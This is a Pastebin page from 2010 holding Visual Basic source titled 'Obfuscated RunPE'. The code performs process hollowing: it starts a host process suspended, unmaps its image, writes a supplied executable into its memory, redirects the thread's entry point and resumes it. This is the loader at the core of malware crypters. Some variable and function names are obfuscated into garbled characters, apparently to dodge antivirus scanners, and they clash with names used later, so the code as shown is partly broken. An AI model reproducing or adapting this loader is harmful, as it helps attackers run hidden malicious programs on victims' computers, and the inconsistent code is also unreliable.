My Pastes
Public Pastes
Layout Width
Share Pastebin
Guest
Public paste!

Obfuscated RunPE

By: a guest | Mar 22nd, 2010 | Syntax: VisualBasic | Size: 7.87 KB | Hits: 50 | Expires: Never
Download | Raw | Embed | Report abuse
Copy text to clipboard
  1. Attribute VB_Name = "Module1"
  2. Option Explicit
  3.  
  4. Private Const CONTEXT_FULL As Long = &H10007
  5. Private Const MAX_PATH As Integer = 260
  6. Private Const CREATE_SUSPENDED As Long = &H4
  7. Private Const MEM_COMMIT As Long = &H1000
  8. Private Const MEM_RESERVE As Long = &H2000
  9. Private Const PAGE_EXECUTE_READWRITE As Long = &H40
  10.  
  11. Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpAppName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
  12. Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, bvBuff As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
  13. Private Declare Function OutputDebugString Lib "kernel32" Alias "OutputDebugStringA" (ByVal lpOutputString As String) As Long
  14.  
  15. Public Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long)
  16. Private Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long
  17. Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
  18. Private Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long
  19.  
  20. Private Type SECURITY_ATTRIBUTES
  21. nLength As Long
  22. lpSecurityDescriptor As Long
  23. bInheritHandle As Long
  24. End Type
  25.  
  26. Private Type STARTUPINFO
  27. cb As Long
  28. lpReserved As Long
  29. lpDesktop As Long
  30. lpTitle As Long
  31. dwX As Long
  32. dwY As Long
  33. dwXSize As Long
  34. dwYSize As Long
  35. dwXCountChars As Long
  36. dwYCountChars As Long
  37. dwFillAttribute As Long
  38. dwFlags As Long
  39. wShowWindow As Integer
  40. cbReserved2 As Integer
  41. lpReserved2 As Long
  42. hStdInput As Long
  43. hStdOutput As Long
  44. hStdError As Long
  45. End Type
  46.  
  47. Private Type PROCESS_INFORMATION
  48. hProcess As Long
  49. hThread As Long
  50. dwProcessId As Long
  51. dwThreadID As Long
  52. End Type
  53.  
  54. Private Type FLOATING_SAVE_AREA
  55. ControlWord As Long
  56. StatusWord As Long
  57. TagWord As Long
  58. ErrorOffset As Long
  59. ErrorSelector As Long
  60. DataOffset As Long
  61. DataSelector As Long
  62. RegisterArea(1 To 80) As Byte
  63. Cr0NpxState As Long
  64. End Type
  65.  
  66. Private Type CONTEXT
  67. ContextFlags As Long
  68.  
  69. Dr0 As Long
  70. Dr1 As Long
  71. Dr2 As Long
  72. Dr3 As Long
  73. Dr6 As Long
  74. Dr7 As Long
  75.  
  76. FloatSave As FLOATING_SAVE_AREA
  77. SegGs As Long
  78. SegFs As Long
  79. SegEs As Long
  80. SegDs As Long
  81. Edi As Long
  82. Esi As Long
  83. Ebx As Long
  84. Edx As Long
  85. Ecx As Long
  86. Eax As Long
  87. Ebp As Long
  88. Eip As Long
  89. SegCs As Long
  90. EFlags As Long
  91. Esp As Long
  92. SegSs As Long
  93. End Type
  94.  
  95. Private Type IMAGE_DOS_HEADER
  96. e_magic As Integer
  97. e_cblp As Integer
  98. e_cp As Integer
  99. e_crlc As Integer
  100. e_cparhdr As Integer
  101. e_minalloc As Integer
  102. e_maxalloc As Integer
  103. e_ss As Integer
  104. e_sp As Integer
  105. e_csum As Integer
  106. e_ip As Integer
  107. e_cs As Integer
  108. e_lfarlc As Integer
  109. e_ovno As Integer
  110. e_res(0 To 3) As Integer
  111. e_oemid As Integer
  112. e_oeminfo As Integer
  113. e_res2(0 To 9) As Integer
  114. e_lfanew As Long
  115. End Type
  116.  
  117. Private Type IMAGE_FILE_HEADER
  118. Machine As Integer
  119. NumberOfSections As Integer
  120. TimeDateStamp As Long
  121. PointerToSymbolTable As Long
  122. NumberOfSymbols As Long
  123. SizeOfOptionalHeader As Integer
  124. characteristics As Integer
  125. End Type
  126.  
  127. Private Type IMAGE_DATA_DIRECTORY
  128. VirtualAddress As Long
  129. Size As Long
  130. End Type
  131.  
  132. Private Type IMAGE_OPTIONAL_HEADER
  133. Magic As Integer
  134. MajorLinkerVersion As Byte
  135. MinorLinkerVersion As Byte
  136. SizeOfCode As Long
  137. SizeOfInitializedData As Long
  138. SizeOfUnitializedData As Long
  139. AddressOfEntryPoint As Long
  140. BaseOfCode As Long
  141. BaseOfData As Long
  142. ' NT additional fields.
  143. ImageBase As Long
  144. SectionAlignment As Long
  145. FileAlignment As Long
  146. MajorOperatingSystemVersion As Integer
  147. MinorOperatingSystemVersion As Integer
  148. MajorImageVersion As Integer
  149. MinorImageVersion As Integer
  150. MajorSubsystemVersion As Integer
  151. MinorSubsystemVersion As Integer
  152. W32VersionValue As Long
  153. SizeOfImage As Long
  154. SizeOfHeaders As Long
  155. CheckSum As Long
  156. SubSystem As Integer
  157. DllCharacteristics As Integer
  158. SizeOfStackReserve As Long
  159. SizeOfStackCommit As Long
  160. SizeOfHeapReserve As Long
  161. SizeOfHeapCommit As Long
  162. LoaderFlags As Long
  163. NumberOfRvaAndSizes As Long
  164. DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY
  165. End Type
  166.  
  167. Private Type IMAGE_NT_HEADERS
  168. Signature As Long
  169. FileHeader As IMAGE_FILE_HEADER
  170. OptionalHeader As IMAGE_OPTIONAL_HEADER
  171. End Type
  172.  
  173. Private Type IMAGE_SECTION_HEADER
  174. SecName As String * 8
  175. VirtualSize As Long
  176. VirtualAddress As Long
  177. SizeOfRawData As Long
  178. PointerToRawData As Long
  179. PointerToRelocations As Long
  180. PointerToLinenumbers As Long
  181. NumberOfRelocations As Integer
  182. NumberOfLinenumbers As Integer
  183. characteristics As Long
  184. End Type
  185.  
  186. Private Function  ÃáììÁÐÉ (ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
  187. Dim  ÏËÍÊÉ  As Long
  188. Dim  ÅÄÃÖÆÒ¨¦ÈÅð°¦ ­ ±©  As Byte
  189. Dim i As Long
  190. Dim  ×ÅÒÄÆ  As Long
  191.  
  192. WERDF = GetProcAddress(LoadLibraryA(sLib), sMod)
  193. If  ×ÅÒÄÆ  = 0 Then Exit Function
  194.  
  195. OKMJI = VarPtr(EDCVFR(0))
  196. RtlMoveMemory ByVal OKMJI, &H59595958, &H4:  ÏËÍÊÉ  =  ÏËÍÊÉ  + 4
  197. RtlMoveMemory ByVal OKMJI, &H5059, &H2:  ÏËÍÊÉ  =  ÏËÍÊÉ  + 2
  198. For i = UBound(Params) To 0 Step -1
  199. RtlMoveMemory ByVal OKMJI, &H68, &H1:  ÏËÍÊÉ  =  ÏËÍÊÉ  + 1
  200. RtlMoveMemory ByVal OKMJI, CLng(Params(i)), &H4:  ÏËÍÊÉ  =  ÏËÍÊÉ  + 4
  201. Next
  202. RtlMoveMemory ByVal OKMJI, &HE8, &H1:  ÏËÍÊÉ  =  ÏËÍÊÉ  + 1
  203. RtlMoveMemory ByVal OKMJI,  ×ÅÒÄÆ  -  ÏËÍÊÉ  - 4, &H4:  ÏËÍÊÉ  =  ÏËÍÊÉ  + 4
  204. RtlMoveMemory ByVal OKMJI, &HC3, &H1:  ÏËÍÊÉ  =  ÏËÍÊÉ  + 1
  205. CallAPI = CallWindowProcA(VarPtr(EDCVFR(0)), 0, 0, 0, 0)
  206. End Function
  207.  
  208. Sub Injec(ByVal sHost As String, ByRef bvBuff() As Byte, parameter As String)
  209. Dim i As Long
  210. Dim  ÁÓÄÆÒÅ  As IMAGE_DOS_HEADER
  211. Dim  ÓÄÅ×Ñà As IMAGE_NT_HEADERS
  212. Dim  ÁØÃÆÒÅÓ  As IMAGE_SECTION_HEADER
  213. Dim  ÖÖÖÖÖÖ  As STARTUPINFO
  214. Dim  Ðé  As PROCESS_INFORMATION
  215. Dim  Ãôø  As CONTEXT
  216.  
  217. VVVVVV.cb = Len(VVVVVV)
  218.  
  219. RtlMoveMemory ASDFRE, bvBuff(0), 64
  220. RtlMoveMemory SDEWQC, bvBuff(ASDFRE.e_lfanew), 248
  221.  
  222. CreateProcessA sHost, " " & parameter, 0, 0, False, CREATE_SUSPENDED, 0, 0, VVVVVV, Pi
  223. CallAPI "ntdll", "NtUnmapViewOfSection", Pi.hProcess, SDEWQC.OptionalHeader.ImageBase
  224. CallAPI "kernel32", "VirtualAllocEx", Pi.hProcess, SDEWQC.OptionalHeader.ImageBase, SDEWQC.OptionalHeader.SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE
  225. WriteProcessMemory Pi.hProcess, ByVal SDEWQC.OptionalHeader.ImageBase, bvBuff(0), SDEWQC.OptionalHeader.SizeOfHeaders, 0
  226.  
  227. For i = 0 To SDEWQC.FileHeader.NumberOfSections - 1
  228. RtlMoveMemory AXCFRES, bvBuff(ASDFRE.e_lfanew + 248 + 40 * i), Len(AXCFRES)
  229. WriteProcessMemory Pi.hProcess, ByVal SDEWQC.OptionalHeader.ImageBase + AXCFRES.VirtualAddress, bvBuff(AXCFRES.PointerToRawData), AXCFRES.SizeOfRawData, 0
  230. Next i
  231.  
  232. Ctx.ContextFlags = CONTEXT_FULL
  233. CallAPI "kernel32", "GetThreadContext", Pi.hThread, VarPtr(Ctx)
  234. WriteProcessMemory Pi.hProcess, ByVal Ctx.Ebx + 8, SDEWQC.OptionalHeader.ImageBase, 4, 0
  235. Ctx.Eax = SDEWQC.OptionalHeader.ImageBase + SDEWQC.OptionalHeader.AddressOfEntryPoint
  236. CallAPI "kernel32", "SetThreadContext", Pi.hThread, VarPtr(Ctx)
  237. CallAPI "kernel32", "ResumeThread", Pi.hThread
  238. End Sub
  239.  
  240. Public Function  ÓôòÔïÂùôÁòòáù (ByVal sStr As String) As Byte()
  241. Dim i As Long
  242. Dim  Âõææåò¨©  As Byte
  243. ReDim Buffer(Len(sStr) - 1)
  244. For i = 1 To Len(sStr)
  245. Buffer(i - 1) = Asc(Mid(sStr, i, 1))
  246. Next i
  247. StrToBytArray = Buffer
  248. End Function
  249.  
  250. Public Function  ÔèéóÅøå () As String
  251. Dim  ìÒåô  As Long
  252. Dim  âöÂõæ樲µµ©  As Byte
  253. lRet =  ÃáììÁÐÉ ("kernel32", "GetModuleFileNameA", App.hInstance, VarPtr(bvBuff(0)), 256)
  254. ThisExe = Left$(StrConv(bvBuff, vbUnicode), lRet)
  255. End Function
create new paste | create new version of this paste RAW Paste Data